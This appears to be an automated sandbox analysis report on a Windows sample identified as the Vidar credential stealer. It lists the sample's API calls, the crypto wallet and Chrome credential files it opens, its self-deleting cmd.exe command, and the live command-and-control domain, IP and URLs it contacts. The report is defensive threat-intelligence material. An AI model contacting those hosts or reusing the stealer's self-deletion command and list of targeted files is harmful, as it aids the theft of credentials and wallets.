Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_00407620 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00407620
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_0040B110 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040B110
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_0040B3A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040B3A0
Source: C:\Users\user\Desktop\b123.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\b123.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\b123.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\b123.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\b123.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\b123.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\b123.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\b123.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\b123.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_004054F0 VirtualProtect ?,00000004,00000100,00000000 0_2_004054F0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_00415FC0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress, 0_2_00415FC0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_00406040 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00406040
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_00415E60 mov eax, dword ptr fs:[00000030h] 0_2_00415E60
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_00401000 mov eax, dword ptr fs:[00000030h] 0_2_00401000
Source: C:\Users\user\Desktop\b123.exe Memory protected: page execute read | page execute and read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\b123.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\b123.exe" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\b123.exe Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree, 0_2_0040CF60
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\b123.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\b123.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\b123.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_0040CE40 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_0040CE40
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_0040CEA0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_0040CEA0
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_004084E0 GetVersionExA,LoadLibraryA,WideCharToMultiByte,lstrlen,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,FreeLibrary, 0_2_004084E0
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_0040CE00 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_0040CE00

Stealing of Sensitive Information
barindex
Yara detected CryptOne packer
Source: Yara match File source: 00000000.00000002.454190962.0000000002070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Vidar stealer
Source: Yara match File source: 00000000.00000002.453604770.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\b123.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\b123.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\b123.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\b123.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\b123.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\b123.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\b123.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\b123.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\b123.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000002.453604770.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected CryptOne packer
Source: Yara match File source: 00000000.00000002.454190962.0000000002070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Vidar stealer
Source: Yara match File source: 00000000.00000002.453604770.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 594632 Sample: b123.exe Startdate: 22/03/2022 Architecture: WINDOWS Score: 100 19 Found malware configuration 2->19 21 Antivirus detection for URL or domain 2->21 23 Multi AV Scanner detection for submitted file 2->23 25 4 other signatures 2->25 7 b123.exe 75 2->7         started        process3 dnsIp4 17 sughicent.com 5.63.155.126, 49750, 80 AS-REGRU Russian Federation 7->17 27 Detected CryptOne packer 7->27 29 Detected unpacking (changes PE section rights) 7->29 31 Detected unpacking (creates a PE file in dynamic memory) 7->31 33 8 other signatures 7->33 11 cmd.exe 1 7->11         started        signatures5 process6 process7 13 conhost.exe 11->13         started        15 timeout.exe 1 11->15         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
5.63.155.126
 sughicent.com Russian Federation
197695 AS-REGRU true

Contacted Domains

Name IP Active
sughicent.com 5.63.155.126 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://sughicent.com/blaka.php true
  • Avira URL Cloud: safe
 unknown
http://sughicent.com/request true
  • Avira URL Cloud: malware
 unknown